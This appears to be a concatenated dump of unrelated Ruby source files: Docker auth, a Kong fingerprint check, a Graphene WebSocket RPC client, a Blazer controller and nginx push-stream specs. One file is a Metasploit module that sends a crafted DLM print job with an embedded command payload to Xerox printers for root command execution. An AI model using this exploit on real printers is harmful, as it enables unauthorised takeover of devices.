          JSON.parse(stdout.read.chomp)
        end

        return unless val
        Docker.authenticate!({
          "serveraddress" => server,
          "username" => val["Username"],
          "email" => "[email protected]",
          "password" => val["Secret"],
        })
      end
    end
  end
end
877e62b4200d684040bb74152aae7cadb3644d8f | 1,437 | module Intrigue
module Ident
module Check
class Kong < Intrigue::Ident::Check::Base
def generate_checks(url)
[
{
type: "fingerprint",
category: "service",
tags: ['Networking', 'Proxy', 'API'],
vendor: "Kong",
product:"Kong",
description:"server header",
version: nil,
match_logic: :all,
matches: [
{
match_type: :content_headers,
match_content: /^server: kong\/[\d\.]+/i,
}
],
references: [],
dynamic_version: lambda { |x|
_first_header_capture(x,/^server: kong\/([\d\.]+)/i)
},
paths: [ { path: "#{url}", follow_redirects: true } ],
inference: true
},
#
{
type: "fingerprint",
category: "service",
tags: ['Networking', 'Proxy', 'API'],
vendor: "Kong",
product:"Kong",
description:"no match body",
version: nil,
references: [],
match_logic: :all,
matches: [
{
match_type: :content_body,
match_content: /^\{\"message\"\:\"no Route matched with those values\"\}/i,
}
],
paths: [ { path: "#{url}", follow_redirects: true } ],
inference: true
},
]
end
end
end
end
end
| 24.775862 | 89 | 0.448156 |
7976dffb8d12a71c3ab9b880fb0a6792697e79b8 | 8,150 | require_relative './json_rpc'
require_relative './subscription'
require 'websocket-eventmachine-client'
module Graphene
module RPC
#
# API 0: stateless APIs called via the rpc instance (id = 0)
# API 1: login and "get api" calls (id = 1); these return the various API ids
# API n: access each specific API through its corresponding id (id = n)
#
# Any method not explicitly defined here is caught by method_missing and
# forwarded to the remote API in the format below
#
# func_name({api_id:id, params:[param1, param2], callback: callback_func})
#
class WebSocketRpc < JsonRpc
include Graphene::RPC::Subscription
# @param api_uri  [String] node endpoint (http/https/ws/wss)
# @param username [String] RPC login name
# @param password [String] RPC login password
# @param options  [Hash] passed through to the JsonRpc superclass
def initialize(api_uri, username, password, options = {})
  @username = username
  @password = password
  # request map: request id (String) => { request:, callback: }
  @requests = {}
  # api_ids map: api name (String) => remote numeric id
  @api_ids = {}
  # Define shorthand readers (database_id, history_id, ...) that pull
  # the matching entry out of @api_ids once ids have been fetched.
  %w(database network_broadcast network_node history).each do |name|
    instance_eval "def #{name}_id; return instance_variable_get('@api_ids').values_at('#{name}').first; end"
  end
  super(api_uri, username, password, options)
end
# override and do nothing
# connection setup is moved to connect method
def init_connection(url, username, password); end
# Opens both transports: a synchronous JSON-RPC HTTP connection (for
# the stateless API-0 calls) and an EventMachine websocket client (for
# async calls and subscriptions). Must be called inside EM.run.
# NOTE(review): mutates @uri.scheme twice to derive both URLs.
def connect
  if @uri.scheme == 'https' || @uri.scheme == 'wss'
    @uri.scheme = 'https'; rpc_uri = @uri.to_s
    @uri.scheme = 'wss'; ws_uri = @uri.to_s
  else
    @uri.scheme = 'http'; rpc_uri = @uri.to_s
    @uri.scheme = 'ws'; ws_uri = @uri.to_s
  end
  log.debug { "connect to: #{@uri.to_s}"}
  # setup rpc connection for sync call
  @rpc = JsonRpc.new(rpc_uri, @username, @password, @options)
  # setup ws connection for async call
  @conn = ::WebSocket::EventMachine::Client.connect(uri: ws_uri)
  @conn.onopen { onopen }
  @conn.onmessage { |msg, type| onmessage(msg, type) }
  @conn.onclose { |code, reason| onclose(code, reason) }
end
# Fetches an account record, by object id ("1.2.x") or account name,
# over the synchronous RPC transport. Returns the first result.
def get_account(name_or_id)
  if is_object_id?(name_or_id)
    call, arg = 'get_objects', [name_or_id]
  else
    call, arg = 'get_account_by_name', name_or_id
  end
  (rpc_exec call, arg)[0]
end
# Fetches an asset record, by object id ("1.3.x") or symbol, over the
# synchronous RPC transport. Returns the first result.
def get_asset(name_or_id)
  call = is_object_id?(name_or_id) ? 'get_objects' : 'lookup_asset_symbols'
  (rpc_exec call, [name_or_id])[0]
end
# Graphene object ids look like "a.b.c" (e.g. "1.2.100"): exactly
# three dot-separated segments.
def is_object_id?(param)
  segments = param.split('.')
  segments.size == 3
end
# async call using rpc
# only accessible to API 0 cateogory calls (stateless calls)
def rpc_exec(method, args)
  # Dynamic dispatch into the JsonRpc instance — presumably resolved by
  # its own method_missing into a blocking HTTP call; confirm in JsonRpc.
  @rpc.send method, args
end
# connection established
# now start do stuffs
# login
# subscribe to apis
#
def onopen
  log.info { "onopen" }
  # First step after the socket opens: authenticate on API 1; onlogin
  # continues the bootstrap (fetching API ids, subscriptions).
  login({ params: [@username, @password], api_id: 1, callback: self.method(:onlogin) })
end
# login
# Callback for the login call: on success, continue by fetching the
# remote API ids; otherwise abort with Unauthorized.
def onlogin(resp)
  unless resp[:result]
    log.info {"Login Failed"}
    raise Unauthorized, "Login Failed"
  end
  log.info {"Login Success"}
  get_api_ids
end
# register and fetch remote id for each api
def get_api_ids
  cb = {api_id: 1, callback: self.method(:on_get_api_id)}
  # These calls have no explicit definition: they go through
  # method_missing and become remote "call" requests on API 1.
  database(cb)
  history(cb)
  network_broadcast(cb)
  # this by default is disabled by api-access.json
  # we don't need it normally
  # network_node(cb)
end
# fill api_ids map
# fill api_ids map
def on_get_api_id(resp)
  req_id = resp[:id]
  # Recover which api was requested from the original request's params
  # ([api_id, method_name, args] — index 1 is the api name).
  api_name = @requests[req_id.to_s][:request][:params][1]
  @api_ids[api_name.downcase.to_s] = resp[:result]
  puts @api_ids # NOTE(review): debug leftover; consider log.debug
  # Once the database api id is known, kick off the subscriptions
  # (commented-out lines are the author's experiments, kept as-is).
  if api_name == "database"
    subscribe_to_objects
    # subscribe_to_accounts(["init0", "init2"], true)
    # subscribe_to_accounts(["1.2.100", "1.2.102"], true)
    # subscribe_to_pending_transactions
    # subscribe_to_future_block("191125")
    subscribe_to_market('1.3.0', '1.3.660')
    # EM.add_timer(5) do
    #   cancel_all_subscriptions
    # end
  end
end
# given api name and return id
# Looks up a previously fetched remote API id by (case-insensitive) name.
def api_id(api_name)
  key = api_name.downcase.to_s
  @api_ids[key]
end
# Websocket receive handler: parses the JSON frame and routes it either
# to the callback registered for its request id, or — when only a
# method id is present — treats it as a subscription notice.
def onmessage(msg, type)
  log.info { "receive: #{msg} [#{type}]" }
  response = JSON.parse(msg, symbolize_names: true)
  request_id = response[:id].to_s
  method_id = response[:method].to_s
  log.debug { response[:error] } if response[:error]
  # after subscribing, response returns a null result
  # don't need to go futher down
  return if response[:result].nil?
  # normal interaction will include request_id
  # otherwise it's notice
  # NOTE(review): String#present? is ActiveSupport, not core Ruby —
  # confirm it is loaded in this environment.
  if request_id.present?
    req = @requests[request_id]
    # callback
    if req && cb = req[:callback]
      # cb[:response] = response
      cb.call(response)
    else
      # just drop it
      log.debug {"Foreign Response ID: no callback defined"}
    end
  # Run registered call backs for individual object notices
  elsif method_id.present?
    puts "notice" # NOTE(review): notice handling looks unfinished
    # on_subscribe_callback(response)
  end
end
#
# @options[Object]: {api_id, params}
#
# @exmaple:
# request(login, {params: ['user', 'password'], api_id: 1, callback: self.onlogin})
#
def request(method, options = [])
  # binding.pry if method == 'get_full_accounts'
  # options = options.length == 1 ? options[0] : options
  req_id = call_id.to_s
  api_id = options[:api_id] || 1
  # Remember the request so onmessage can route the response back to
  # its callback by id.
  req = {
    request: {
      id: req_id,
      method: "call",
      params: [api_id, method, options[:params] || []]
    },
    callback: options[:callback]
  }
  @requests[req_id] = req
  # Defer the actual send to the reactor so request() is safe to call
  # from any callback context.
  EM.next_tick do
    log.info { "send: #{req[:request]}" }
    @conn.send JSON.dump(req[:request])
  end
end
# Catch-all proxy: any unknown method becomes a remote "call" request.
# A single Hash argument is used as the options verbatim; anything
# else is wrapped into { params: [...] }. api_id defaults to 1.
def method_missing(name, *args)
  params = args.length > 1 ? args : args[0]
  params = { params: params.is_a?(Array) ? params : [params] } unless params.is_a? Hash
  request(name.to_s, { api_id: 1 }.merge(params))
end

# Keep respond_to? consistent with the catch-all above (idiomatic
# companion to method_missing; the original omitted it, so
# respond_to? lied about what this proxy accepts).
def respond_to_missing?(_name, _include_private = false)
  true
end
# clean up logic goes here
def onclose(code, reason)
  log.info { "disconnected with status code: #{code}" }
  # Stopping the reactor ends the whole program's event loop.
  EM.stop
end
def log_level
  # Fixed logger verbosity for this client.
  :debug
end
# subscription handle
# we use call_id to present subscription handle
# it will increase automatically
# with each specific subscribe call
# call_id = identfier + 1
# because internal counter is auto incremented
def identifier
  # Returns the current internal counter; per the comment above, the
  # effective subscription handle is identifier + 1 because call_id
  # auto-increments on the next request.
  call_id
end
end
end
end
# Manual smoke test: run this file directly to connect to a local node.
if $0 == __FILE__
  $:.unshift( File.expand_path("../../..", __FILE__) )
  require 'graphene'
  require 'graphene/rpc'
  require 'graphene/rpc/json_rpc'
  # require 'eventmachine'

  # Line-based keyboard input forwarded to the websocket (unused below —
  # the EM.open_keyboard call is commented out).
  class KeyboardHandler < EM::Connection
    include EM::Protocols::LineText2
    attr_reader :ws
    def initialize(ws)
      puts "keyboard inited"
      @ws = ws
    end
    def receive_data(data)
      puts "data: #{data}"
    end
    def receive_line(data)
      puts "line: #{data}"
      @ws.send data
    end
  end

  # Minimal echo handler variant, also unused.
  module KH
    def receive_data data
      puts ">#{data}"
    end
  end

  puts "Graphene WebSocketRpc test.."
  begin
    # EM.epoll
    EM.run do
      # trap("TERM") { stop }
      # trap("INT") { stop }
      wsrpc = Graphene::RPC::WebSocketRpc.new('ws://127.0.0.1:8099', 'user', 'pass', nolog: false)
      wsrpc.connect
      # EM.open_keyboard(KeyboardHandler, wsrpc)
      # EM.open_keyboard(KH)
    end
  # NOTE(review): WebSocketRpc::Error is not defined in this file —
  # presumably inherited from JsonRpc; confirm.
  rescue Graphene::RPC::WebSocketRpc::Error => e
    puts "error occured"
    puts e.class
    puts e
  rescue Exception => e
    puts "Uncaptured"
    puts e.class
    puts e.backtrace
  end
end
39020f5b951309fbcbe6ad216f3051686d29fa83 | 196 | require "application_system_test_case"
# System tests for Hosts. Generated scaffold: every example is still
# commented out, so this suite currently exercises nothing.
class HostsTest < ApplicationSystemTestCase
  # test "visiting the index" do
  #   visit hosts_url
  #
  #   assert_selector "h1", text: "Host"
  # end
end
011ecd8f6ee2b5c54ce5128e37c8751d1c2ed683 | 291 | module Steps
module Opening
class ResearchConsentController < Steps::OpeningStepController
def edit
@form_object = ResearchConsentForm.build(current_c100_application)
end
def update
update_and_advance(ResearchConsentForm)
end
end
end
end
| 20.785714 | 74 | 0.71134 |
38735fbbeea3bf12c486c17a3ed32b3554bc657e | 4,350 | ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::Tcp
# Module metadata and options. The exploit delivers a crafted DLM
# ("patch") print job; see the exploit method for the payload framing.
def initialize(info = {})
  super(update_info(info,
    'Name' => 'Xerox Multifunction Printers (MFP) "Patch" DLM Vulnerability',
    'Description' => %q{
      This module exploits a vulnerability found in Xerox Multifunction Printers (MFP). By
      supplying a modified Dynamic Loadable Module (DLM), it is possible to execute arbitrary
      commands under root privileges.
    },
    'Author' =>
      [
        'Deral "Percentx" Heiland',
        'Pete "Bokojan" Arzamendi'
      ],
    'References' =>
      [
        ['BID', '52483'],
        ['URL', 'http://www.xerox.com/download/security/security-bulletin/1284332-2ddc5-4baa79b70ac40/cert_XRX12-003_v1.1.pdf'],
        ['URL', 'http://foofus.net/goons/percx/Xerox_hack.pdf']
      ],
    'Privileged' => true,
    'License' => MSF_LICENSE,
    # Payload is embedded in a job comment; space is capped at 512
    # bytes and restricted to plain command payloads.
    'Payload' =>
      {
        'DisableNops' => true,
        'Space' => 512,
        'Compat' =>
          {
            'PayloadType' => 'cmd cmd_bash',
            'RequiredCmd' => 'generic bash-tcp'
          }
      },
    'Platform' => ['unix'],
    'Arch' => ARCH_CMD,
    'Targets' => [['Automatic', {}]],
    'DisclosureDate' => 'Mar 07 2012',
    'DefaultTarget' => 0))

  register_options(
    [
      # 9100 is the standard raw/JetDirect print port.
      Opt::RPORT(9100)
    ])
end
def exploit
print_status("#{rhost}:#{rport} - Sending print job...")
firmcode = '%%XRXbegin' + "\x0A"
firmcode << '%%OID_ATT_JOB_TYPE OID_VAL_JOB_TYPE_DYNAMIC_LOADABLE_MODULE' + "\x0A"
firmcode << '%%OID_ATT_JOB_SCHEDULING OID_VAL_JOB_SCHEDULING_AFTER_COMPLETE' + "\x0A"
firmcode << '%%OID_ATT_JOB_COMMENT "PraedaPWN2014:' + "#{payload.encoded}" + ':"' + "\x0A"
firmcode << '%%OID_ATT_JOB_COMMENT "patch"' + "\x0A"
firmcode << '%%OID_ATT_DLM_NAME "xerox"' + "\x0A"
firmcode << '%%OID_ATT_DLM_VERSION "NO_DLM_VERSION_CHECK"' + "\x0A"
firmcode << '%%OID_ATT_DLM_SIGNATURE "ca361047da56db9dd81fee6a23ff875facc3df0e1153d325c2d217c0e75f861b"' + "\x0A"
firmcode << '%%OID_ATT_DLM_EXTRACTION_CRITERIA "extract /tmp/xerox.dnld"' + "\x0A"
firmcode << '%%XRXend' + "\x0A\x1F\x8B\x08\x00\xB1\x8B\x49\x54\x00\x03\xED"
firmcode << "\xD3\x41\x4B\xC3\x30\x14\x07\xF0\x9E\xFB\x29\xFE\xE2\x60\x20\x74"
firmcode << "\x69\x63\x37\x61\x5A\xBC\x79\x94\xDD\x3C\xC8\xA0\x59\x9B\xDA\x4A"
firmcode << "\xD7\xCC\xB4\xD3\x1D\xF6\xE1\x8D\xDD\x64\xB8\x83\x3B\x0D\x11\xFE"
firmcode << "\xBF\x43\x03\xAF\x2F\xEF\xBD\xB4\x64\xA3\xAD\xD9\x8C\xDA\xD2\x3B"
firmcode << "\xA3\xD0\xB9\x19\x8F\xFB\xD5\x39\x5E\xC3\x58\x4E\xBC\x48\xC6\x52"
firmcode << "\x5E\x87\xE3\x89\x8C\xBD\x30\x8A\xE4\x44\x7A\x08\xCF\x39\xD4\xB7"
firmcode << "\x75\xDB\x29\x0B\x78\xD6\x98\xEE\xB7\xBC\x53\xEF\xFF\xA9\xCB\x0B"
firmcode << "\xB1\xA8\x1A\xB1\x50\x6D\xE9\x17\x55\x9D\xA4\x2F\x56\xAF\x10\xD4"
firmcode << "\x08\x1E\x30\x9C\x59\xA5\x73\x35\x7B\x7A\x94\x61\x14\x0F\x21\xDE"
firmcode << "\x95\x15\xED\xCA\x98\x5A\x34\x99\x68\x74\x27\x5E\xCD\x62\x7A\x35"
firmcode << "\x8A\x52\xBF\x2A\xF0\x8C\xA0\xC0\xC0\xD5\xC0\xDC\xEF\x4A\xDD\xF8"
firmcode << "\xC0\x47\x59\xD5\x1A\x56\xAB\x1C\x75\xD5\x68\x17\xC9\x8D\x7B\x00"
firmcode << "\x3A\x2B\x0D\x06\x5F\x31\x6C\xB1\xEB\xF8\x06\xFC\x68\xD7\xE7\xF5"
firmcode << "\x65\x07\xF7\x48\x12\x84\x98\xDF\x62\x5F\x17\xC8\xCC\x72\xA9\x9A"
firmcode << "\x3C\x49\x0F\x95\xB6\xD9\xBA\x43\x90\x4F\xDD\x18\x32\xED\x93\x8A"
firmcode << "\xAA\xEF\xE8\x9A\xDC\xF5\x83\xF9\xBB\xE4\xFD\xDE\xED\xE1\xE0\x76"
firmcode << "\x89\x91\xD8\xEC\x6F\x82\xFB\x0C\xFE\x5F\xFF\x15\x22\x22\x22\x22"
firmcode << "\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\xA2\xD3\x3E"
firmcode << "\x01\x5A\x18\x54\xBB\x00\x28\x00\x00"
begin
connect
sock.put(firmcode)
handler
rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout => e
print_error("#{rhost}:#{rport} - #{e.message}")
ensure
disconnect
end
end
end
| 45.3125 | 130 | 0.617701 |
acb475e92ab718531b3af74a9c7f76d89313b829 | 6,441 | require 'spec_helper'
# Integration specs for the push-stream module's HTTP keepalive support:
# many publish/stats/subscribe operations reused over a single TCP
# connection against a test nginx instance.
describe "Keepalive" do
  let(:config) do
    {
      :shared_memory_size => '256m',
      :keepalive_requests => 500,
      :header_template => '',
      :message_template => '~text~',
      :footer_template => '',
      :publisher_mode => 'admin'
    }
  end

  # Publishes to thousands of channels while reusing two persistent
  # connections, checking the publisher's JSON bookkeeping each time.
  it "should create many channels on the same socket" do
    channel = 'ch_test_create_many_channels_'
    body = 'channel started'
    channels_to_be_created = 4000

    nginx_run_server(config, :timeout => 25) do |conf|
      http_single = Net::HTTP::Persistent.new "single_channel"
      http_double = Net::HTTP::Persistent.new "double_channel"
      uri = URI.parse nginx_address

      0.step(channels_to_be_created - 1, 500) do |i|
        1.upto(500) do |j|
          post_single = Net::HTTP::Post.new "/pub?id=#{channel}#{i + j}"
          post_single.body = body
          response_single = http_single.request(uri, post_single)
          expect(response_single.code).to eql("200")
          expect(response_single.body).to eql(%({"channel": "#{channel}#{i + j}", "published_messages": 1, "stored_messages": 1, "subscribers": 0}\r\n))

          # Publishing to two channels at once returns aggregate server info.
          post_double = Net::HTTP::Post.new "/pub?id=#{channel}#{i + j}/#{channel}#{i}_#{j}"
          post_double.body = body
          response_double = http_double.request(uri, post_double)
          expect(response_double.code).to eql("200")
          expect(response_double.body).to match_the_pattern(/"hostname": "[^"]*", "time": "\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}", "channels": #{(i + j) * 2}, "wildcard_channels": 0, "uptime": [0-9]*, "infos": \[\r\n/)
          expect(response_double.body).to match_the_pattern(/"channel": "#{channel}#{i + j}", "published_messages": 2, "stored_messages": 2, "subscribers": 0},\r\n/)
          expect(response_double.body).to match_the_pattern(/"channel": "#{channel}#{i}_#{j}", "published_messages": 1, "stored_messages": 1, "subscribers": 0}\r\n/)
        end
      end
    end
  end

  # Same as above but with channel_info_on_publish off: responses are empty.
  it "should create many channels on the same socket without info on response" do
    channel = 'ch_test_create_many_channels_'
    body = 'channel started'
    channels_to_be_created = 4000

    nginx_run_server(config.merge({:channel_info_on_publish => "off"}), :timeout => 25) do |conf|
      uri = URI.parse nginx_address
      0.step(channels_to_be_created - 1, 500) do |i|
        http = Net::HTTP::Persistent.new
        1.upto(500) do |j|
          post = Net::HTTP::Post.new "/pub?id=#{channel}#{i + j}"
          post.body = body
          response = http.request(uri, post)
          expect(response.code).to eql("200")
          expect(response.body).to eql("")
        end
      end
    end
  end

  # Mixes GET/POST/DELETE publisher and stats operations on one raw socket,
  # asserting each raw HTTP response body/header in sequence.
  it "should execute different operations using the same socket" do
    channel = 'ch_test_different_operation_with_keepalive'
    content = 'message to be sent'

    nginx_run_server(config) do |conf|
      socket = open_socket(nginx_host, nginx_port)
      headers, body = get_in_socket("/pub", socket)
      expect(body).to eql("")
      expect(headers).to include("No channel id provided.")

      headers, body = post_in_socket("/pub?id=#{channel}", content, socket, {:wait_for => "}\r\n"})
      expect(body).to eql("{\"channel\": \"#{channel}\", \"published_messages\": 1, \"stored_messages\": 1, \"subscribers\": 0}\r\n")

      headers, body = get_in_socket("/channels-stats", socket)
      expect(body).to match_the_pattern(/"channels": 1, "wildcard_channels": 0, "published_messages": 1, "stored_messages": 1, "messages_in_trash": 0, "channels_in_delete": 0, "channels_in_trash": 0, "subscribers": 0, "uptime": [0-9]*, "by_worker": \[\r\n/)
      expect(body).to match_the_pattern(/\{"pid": "[0-9]*", "subscribers": 0, "uptime": [0-9]*\}/)

      # Deleting a channel that never existed must 404.
      socket.print("DELETE /pub?id=#{channel}_1 HTTP/1.1\r\nHost: test\r\n\r\n")
      headers, body = read_response_on_socket(socket)
      expect(headers).to include("HTTP/1.1 404 Not Found")

      headers, body = get_in_socket("/channels-stats?id=ALL", socket)
      expect(body).to match_the_pattern(/"hostname": "[^"]*", "time": "\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}", "channels": 1, "wildcard_channels": 0, "uptime": [0-9]*, "infos": \[\r\n/)
      expect(body).to match_the_pattern(/"channel": "#{channel}", "published_messages": 1, "stored_messages": 1, "subscribers": 0}\r\n/)

      headers, body = get_in_socket("/pub?id=#{channel}", socket)
      expect(body).to eql("{\"channel\": \"#{channel}\", \"published_messages\": 1, \"stored_messages\": 1, \"subscribers\": 0}\r\n")

      headers, body = post_in_socket("/pub?id=#{channel}/broad_#{channel}", content, socket, {:wait_for => "}\r\n"})
      expect(body).to match_the_pattern(/"hostname": "[^"]*", "time": "\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}", "channels": 1, "wildcard_channels": 1, "uptime": [0-9]*, "infos": \[\r\n/)
      expect(body).to match_the_pattern(/"channel": "#{channel}", "published_messages": 2, "stored_messages": 2, "subscribers": 0},\r\n/)
      expect(body).to match_the_pattern(/"channel": "broad_#{channel}", "published_messages": 1, "stored_messages": 1, "subscribers": 0}\r\n/)

      headers, body = get_in_socket("/channels-stats?id=#{channel}", socket)
      expect(body).to match_the_pattern(/{"channel": "#{channel}", "published_messages": 2, "stored_messages": 2, "subscribers": 0}\r\n/)

      socket.print("DELETE /pub?id=#{channel} HTTP/1.1\r\nHost: test\r\n\r\n")
      headers, body = read_response_on_socket(socket)
      expect(headers).to include("X-Nginx-PushStream-Explain: Channel deleted.")
      socket.close
    end
  end

  # Long-polling subscriber re-issues GET on the same socket 500 times,
  # pairing each with a publish on a second socket.
  it "should accept subscribe many times using the same socket" do
    channel = 'ch_test_subscribe_with_keepalive'
    body_prefix = 'message to be sent'
    get_messages = "GET /sub/#{channel} HTTP/1.1\r\nHost: test\r\n\r\n"

    nginx_run_server(config.merge(:store_messages => 'off', :subscriber_mode => 'long-polling'), :timeout => 5) do |conf|
      socket = open_socket(nginx_host, nginx_port)
      socket_pub = open_socket(nginx_host, nginx_port)
      1.upto(500) do |j|
        socket.print(get_messages)
        post_in_socket("/pub?id=#{channel}", "#{body_prefix} #{j.to_s.rjust(3, '0')}", socket_pub, {:wait_for => "}\r\n"})
        headers, body = read_response_on_socket(socket, "\r\n0\r\n\r\n")
        # "16" is the chunked-encoding size of the 22-byte message body.
        expect(body).to eql("16\r\nmessage to be sent #{j.to_s.rjust(3, '0')}\r\n0\r\n\r\n")
      end
      socket.close
      socket_pub.close
    end
  end
end
| 48.428571 | 257 | 0.62925 |
1ce7e088c563b96793ff34a20108dcd17dd6d547 | 138 | class ProfessionalSpecializationsResume < ApplicationRecord
belongs_to :professional_specialization
belongs_to :resume, touch: true
end
| 27.6 | 59 | 0.869565 |
03f872d812a128392842b40ded024332994ae2f9 | 7,148 | module Blazer
# Base controller for all Blazer screens. Strips the host application's
# action callbacks, wires optional HTTP basic auth / before_action hooks,
# and provides the variable-substitution helpers shared by query screens.
class BaseController < ApplicationController
  # skip filters
  filters = _process_action_callbacks.map(&:filter) - [:activate_authlogic]
  if Rails::VERSION::MAJOR >= 5
    skip_before_action(*filters, raise: false)
    skip_after_action(*filters, raise: false)
    skip_around_action(*filters, raise: false)
  else
    skip_action_callback *filters
  end

  protect_from_forgery with: :exception

  before_action :load_service

  # Optional HTTP basic auth, enabled via environment variables.
  if ENV["BLAZER_PASSWORD"]
    http_basic_authenticate_with name: ENV["BLAZER_USERNAME"], password: ENV["BLAZER_PASSWORD"]
  end

  # Host-app-supplied authorization hook (configured in the initializer).
  if Blazer.before_action
    before_action Blazer.before_action.to_sym
  end

  layout "blazer/application"

  private

  # Extracts `{var}` placeholders from +statement+, resolves each variable's
  # value from request params / data-source defaults, and substitutes the
  # values in place. Sets @success to whether every variable has a value.
  def process_vars(statement, data_source)
    (@bind_vars ||= []).concat(Blazer.extract_vars(statement)).uniq!
    awesome_variables = {}
    @bind_links = @bind_vars
    @bind_vars = @bind_vars.reject{|var| var.end_with? '_table'}.reject{|var| var.start_with? 'gcs_file_link_'} # dynamic variables only
    @bind_vars.each do |var|
      params[var] ||= Blazer.data_sources[data_source].variable_defaults[var] # currently unused on our side
      awesome_variables[var] ||= Blazer.data_sources[data_source].awesome_variables[var]
    end
    # Check whether every dynamic variable arrived as a parameter; on first
    # page entry the parameters are absent, so substitution is skipped.
    @success = @bind_vars.all? { |v| params[v] }
    if @success
      @bind_vars.each do |var| # process the values passed via params for each bind variable
        value = params[var].presence
        if value
          if ["start_time", "end_time"].include?(var)
            value = value.to_s.gsub(" ", "+") # fix for Quip bug
          end
          # *_at variables are parsed as times in the configured zone.
          if var.end_with?("_at")
            begin
              value = Blazer.time_zone.parse(value)
            rescue
              # do nothing
            end
          end
          # Coerce purely numeric strings to Integer / Float.
          if value =~ /\A\d+\z/
            value = value.to_i
          elsif value =~ /\A\d+\.\d+\z/
            value = value.to_f
          end
        end
        variable = awesome_variables[var]
        if variable.present? && variable['type'] == 'condition'
          if value.present? && variable['style'] == 'checkbox'
            statement.gsub!("{#{var}}"," #{value.join(' or ')} ")
          elsif value.present? && variable['style'] == 'file'
            # File-style conditions point at an uploaded temp table.
            table_name = "wheelhouse_temp.#{value}"
            statement.gsub!("{#{var}}", table_name)
          elsif value.present? || variable['style'] == 'text'
            statement.gsub!("{#{var}}", value.to_s)
          else
            # Empty condition collapses to a no-op predicate.
            statement.gsub!("{#{var}}", 'true')
          end
        else
          statement.gsub!("{#{var}}", ActiveRecord::Base.connection.quote(value)) # variables not declared in blazer.yml are substituted with the quoted value
        end
      end
    end
  end

  # Substitutes GCS file-link variables so the linked file can be loaded
  # into the BigQuery query (original comment translated from Korean).
  def process_file_link(statement, data_source)
    awesome_variables = {}
    @bind_links = @bind_links.select{|var| var.start_with? 'gcs_file_link_'}
    @bind_links = @bind_links.select{|var| params[var] != '' }
    return [] unless @bind_links.present?
    @bind_links.each do |var|
      params[var] ||= Blazer.data_sources[data_source].variable_defaults[var]
      awesome_variables[var] ||= Blazer.data_sources[data_source].awesome_variables[var]
    end
    @success = @bind_links.all? { |v| params[v] }
    if @success
      @bind_links.each do |var|
        awesome_variables[var] ||= Blazer.data_sources[data_source].awesome_variables[var]
      end
      @bind_links.each do |var|
        variable = awesome_variables[var]
        # Substitute the configured table name for the file-link variable.
        value = variable['value'][0]['table_name']
        statement.gsub!("{#{var}}", value )
      end
    end
  end

  # Substitutes `*_table` variables (and empty gcs_file_link_* variables)
  # with concrete table names built from the data source configuration.
  def process_tables(statement, data_source)
    (@bind_tables ||= []).concat(Blazer.extract_vars(statement))
    awesome_variables = {}
    @bind_tables = @bind_tables.select{|r| (r.end_with? '_table') || ((r.start_with? 'gcs_file_link_') && (params[r] == '')) }
    return unless @bind_tables.present?
    @bind_tables.each do |var|
      awesome_variables[var] ||= Blazer.data_sources[data_source].awesome_variables[var]
    end
    @bind_tables.each do |var|
      variable = awesome_variables[var]
      if var.start_with? 'gcs_file_link_'
        # No file selected: substitute a harmless placeholder.
        statement.gsub!("{#{var}}", 'empty' )
      elsif variable.present? && variable['type'] == 'table'
        prefix_table = variable['value']['name']
        # NOTE(review): eval on a configured suffix expression — ensure the
        # blazer.yml configuration is trusted input.
        suffix = eval(variable['value']['suffix'])
        value =prefix_table + suffix
        statement.gsub!("{#{var}}", value )
      end
    end
  end

  # Resolves a smart variable's options (Hash, Array, or SQL query) from the
  # data source or any data source it inherits smart settings from.
  # Returns [options, error].
  def parse_smart_variables(var, data_source)
    smart_var_data_source =
      ([data_source] + Array(data_source.settings["inherit_smart_settings"]).map { |ds| Blazer.data_sources[ds] }).find { |ds| ds.smart_variables[var] }

    if smart_var_data_source
      query = smart_var_data_source.smart_variables[var]

      if query.is_a? Hash
        smart_var = query.map { |k,v| [v, k] }
      elsif query.is_a? Array
        smart_var = query.map { |v| [v, v] }
      elsif query
        result = smart_var_data_source.run_statement(query)
        smart_var = result.rows.map { |v| v.reverse }
        error = result.error if result.error
      end
    end

    [smart_var, error]
  end

  # Resolves an "awesome variable" definition (Hash config or SQL query).
  # Returns [definition, error].
  def parse_awesome_variables(var, data_source)
    # awesome_var_data_source =
    #   ([data_source] + Array(data_source.settings["inherit_smart_settings"]).map { |ds| Blazer.data_sources[ds] }).find { |ds| ds.smart_variables[var] }
    awesome_var_data_source =
      ([data_source] + Array(data_source.settings["inherit_smart_settings"]).map { |ds| Blazer.data_sources[ds] }).find { |ds| ds.awesome_variables[var] } # this part also needs revision later

    if awesome_var_data_source
      query = awesome_var_data_source.awesome_variables[var]

      if query.is_a? Hash
        awesome_var = query
      elsif query
        result = awesome_var_data_source.run_statement(query)
        awesome_var = result.rows.map { |v| v.reverse }
        error = result.error if result.error
      end
    end

    [awesome_var, error]
  end

  # All request params except routing/internal keys — i.e. just the
  # user-supplied variable values.
  def variable_params
    params.except(:controller, :action, :id, :host, :query, :dashboard, :query_id, :query_ids, :table_names, :authenticity_token, :utf8, :_method, :commit, :statement, :data_source, :name, :fork_query_id, :blazer, :run_id).permit!
  end
  helper_method :variable_params

  # The current user as resolved via the configured Blazer.user_method.
  def blazer_user
    send(Blazer.user_method) if Blazer.user_method && respond_to?(Blazer.user_method)
  end
  helper_method :blazer_user

  # Re-renders new/edit with validation errors and a 422 status.
  def render_errors(resource)
    @errors = resource.errors
    action = resource.persisted? ? :edit : :new

    render action, status: :unprocessable_entity
  end

  # do not inherit from ApplicationController - #120
  def default_url_options
    {}
  end

  # TODO: later, create the cloud service according to the data_source
  # being viewed (translated from the original Korean comment).
  def load_service(service = CloudService.new('google'))
    @cloud ||= service.cloud
  end
end
end
| 36.10101 | 232 | 0.615417 |
ff235304c964b4ad9bec0f1eb669468dbd047060 | 1,857 | # frozen_string_literal: true
module VcReader
# Repository over the list of VCLink objects parsed from the site.
# Tracks pagination with an internal 1-based cursor and persists visited
# hrefs through the injected FileManager.
class LinkRepository
  attr_accessor :last_id, :links
  attr_reader :per_page

  # @param file_manager [FileManager] persistence backend for visited hrefs
  # @param per_page [Integer] number of links shown per page
